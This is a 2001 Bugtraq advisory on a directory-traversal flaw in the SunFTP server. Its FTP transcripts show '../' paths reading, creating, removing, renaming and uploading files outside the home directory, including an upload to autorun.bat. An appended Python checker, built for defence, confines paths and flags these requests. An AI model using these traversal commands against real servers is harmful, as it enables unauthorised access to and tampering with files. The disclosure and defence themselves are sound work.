Bugtraq: Sunftp build9(1) - ftp server Vulnerability

From: <se00020_at_LION.CC>
Date: Fri, 2 Mar 2001 12:14:23 -0000

It is possible to break out of the root directory by using relative paths.

e:\crap was used as the home directory of user test.

#the get command#

getting files from outside of the root dir.

220 chris FTP Server (SunFTP b9) ready on port 21...
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 test.txt
226 File sent ok
FTP: 179 Bytes empfangen in 0,00Sekunden 179000,00KB/s
ftp> cd ..
501 CWD failed. No permission
ftp> get ../sunftptest.txt
200 Port command successful.
150 Opening data connection for ../sunftptest.txt.
226 File sent ok
FTP: 1443 Bytes empfangen in 0,00Sekunden 1443000,00KB/s

#the mkdir command#

without priv. to create directories:

ftp> mkdir test
550 '/test': can't create directory.
ftp> mkdir ../test
257 '/../test': directory created.

Hell! It's getting worse...

#the rmdir command#

without any priv. to remove anything

ftp> rmdir ../test
250 '/../test': directory removed.

this only works with empty directories

#the rename command#

It is possible to rename files outside of the root directory without
permissions. It is also possible to move files with the rename command
when the filename is known.

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
226 File sent ok
FTP: 240 Bytes empfangen in 0,00Sekunden 240000,00KB/s
ftp> cd ..
501 CWD failed. No permission
ftp> rename ../sunftptest.txt movedtohomedir.txt
350 File exists, ready for destination name.
250 File '/../sunftptest.txt' renamed to '/movedtohomedir.txt'.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden 314000,00KB/s

#the put command#

If you have permission to upload files, you can put these files
outside of the homedir.

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden 314000,00KB/s
ftp> put
Lokale Datei c:\test.txt
Remotedatei test.txt
200 Port command successful.
150 Opening data connection for test.txt.
226 File received ok
ftp> put
Lokale Datei c:\test.txt
Remotedatei ../autorun.bat
200 Port command successful.
150 Opening data connection for ../autorun.bat.
226 File received ok

Solution

No quick bugfix. Use with care.

I tried to contact the authors, but their webpage seems to be down.

se00020_at_lion.cc or
se00020_at_fhs-hagenberg.ac.at
Received on Mar 02 2001
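
In the transcripts above the server refuses "cd .." but accepts "../" in get, mkdir, rmdir, rename and put, so the home-directory check is applied to CWD only. The following is an added example, not SunFTP code and not part of the original post: a confinement check that every path-taking command goes through. The function names, the verb list and the mapping of the client commands to protocol verbs are assumptions made for the illustration.

```python
import posixpath

PATH_VERBS = {"CWD", "RETR", "STOR", "MKD", "RMD", "RNFR", "RNTO"}

class PathEscape(Exception):
    """Client path resolves outside the user's home directory."""

def resolve(home, cwd, arg):
    """Map a client path to a real path under `home`; cwd is virtual ('/' = home)."""
    # Windows accepts both separators, so normalise before looking for '..'.
    arg = arg.replace("\\", "/")
    # Assumption: no legitimate name contains ':' or NUL (drive letters, streams).
    if ":" in arg or "\x00" in arg:
        raise PathEscape(arg)
    virtual = arg if arg.startswith("/") else posixpath.join(cwd, arg)
    kept = []
    for part in virtual.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not kept:              # would climb above the virtual root
                raise PathEscape(arg)
            kept.pop()
        else:
            kept.append(part)
    return posixpath.join(home, *kept)

def authorize(home, cwd, verb, arg):
    """Return the confined real path, or None when the server must refuse."""
    if verb.upper() not in PATH_VERBS:
        raise ValueError("not a path-taking verb: " + verb)
    try:
        return resolve(home, cwd, arg)
    except PathEscape:
        return None

# Constructed sample: the advisory's client commands as FTP protocol verbs.
SAMPLE = [("CWD", ".."), ("RETR", "../sunftptest.txt"), ("MKD", "../test"),
          ("RMD", "../test"), ("RNFR", "../sunftptest.txt"),
          ("STOR", "../autorun.bat"), ("RETR", "test.txt"),
          ("RNTO", "movedtohomedir.txt")]

def audit(home="e:/crap", cwd="/"):
    """Return (verb, arg, real_path_or_None) for each sample request."""
    return [(v, a, authorize(home, cwd, v, a)) for v, a in SAMPLE]

if __name__ == "__main__":
    for verb, arg, real in audit():
        print(f"{verb:5} {arg:22} -> {real or '550 refused'}")
```

The check is purely lexical; a server should additionally canonicalise the resulting real path (links, junctions) and confirm it still lies under the home directory before opening it.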
